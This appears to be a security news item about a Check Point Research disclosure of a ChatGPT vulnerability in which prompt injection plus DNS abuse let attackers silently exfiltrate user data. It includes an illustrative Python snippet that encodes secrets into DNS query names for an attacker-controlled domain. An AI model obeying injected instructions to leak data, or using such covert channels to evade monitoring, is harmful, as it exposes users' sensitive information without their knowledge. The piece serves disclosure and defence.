Check Point Research (CPR) has uncovered a significant vulnerability in ChatGPT that allowed silent data exfiltration through a combination of DNS abuse and prompt injection. The flaw let attackers bypass standard security controls and steal sensitive user information, such as medical data and personal contracts, without alerting the user. CPR notes that DNS, often treated as benign infrastructure, can be exploited to covertly transmit data, creating a blind spot in common security assumptions about AI tools.

OpenAI addressed the vulnerability with a patch on February 20, 2026, alongside a fix for a separate issue that exposed GitHub authentication tokens. The incident is a caution to security teams: AI systems require ongoing scrutiny, because attackers can exploit both the underlying infrastructure and user behavior. It also underscores the need for secure data-handling practices in AI applications to protect sensitive information from emerging threats.
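To see why DNS makes such an effective covert channel, consider how arbitrary data can be packed into the hostname of an ordinary DNS lookup. The sketch below is illustrative only and does not reproduce CPR's findings: the domain name, function names, and encoding scheme are all hypothetical. It shows the general technique of hex-encoding a secret and splitting it into DNS labels (each capped at 63 octets per the DNS specification), so that resolver queries reaching an attacker-controlled nameserver carry the payload in the queried names.

```python
# Illustrative sketch of DNS-based data smuggling, NOT code from CPR's report.
# ATTACKER_DOMAIN, exfil_labels, and reassemble are hypothetical names chosen
# for this example.

ATTACKER_DOMAIN = "collector.example"  # hypothetical attacker-controlled zone
MAX_LABEL = 63  # DNS limits each label to 63 octets

def exfil_labels(secret: bytes) -> list[str]:
    """Encode secret bytes as hostnames an attacker's nameserver would log."""
    encoded = secret.hex()
    chunks = [encoded[i:i + MAX_LABEL]
              for i in range(0, len(encoded), MAX_LABEL)]
    # One query per chunk; a leading sequence label keeps chunks orderable.
    return [f"{n}.{chunk}.{ATTACKER_DOMAIN}" for n, chunk in enumerate(chunks)]

def reassemble(hostnames: list[str]) -> bytes:
    """What the attacker's nameserver does with the logged query names."""
    parts = sorted((h.split(".") for h in hostnames), key=lambda p: int(p[0]))
    return bytes.fromhex("".join(p[1] for p in parts))

if __name__ == "__main__":
    names = exfil_labels(b"patient record #1234")
    print(names[0])  # e.g. "0.<hex payload>.collector.example"
    assert reassemble(names) == b"patient record #1234"
```

Because queries like these look like routine name resolution, they typically pass through firewalls and proxies unchallenged, which is exactly the blind spot CPR highlights.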
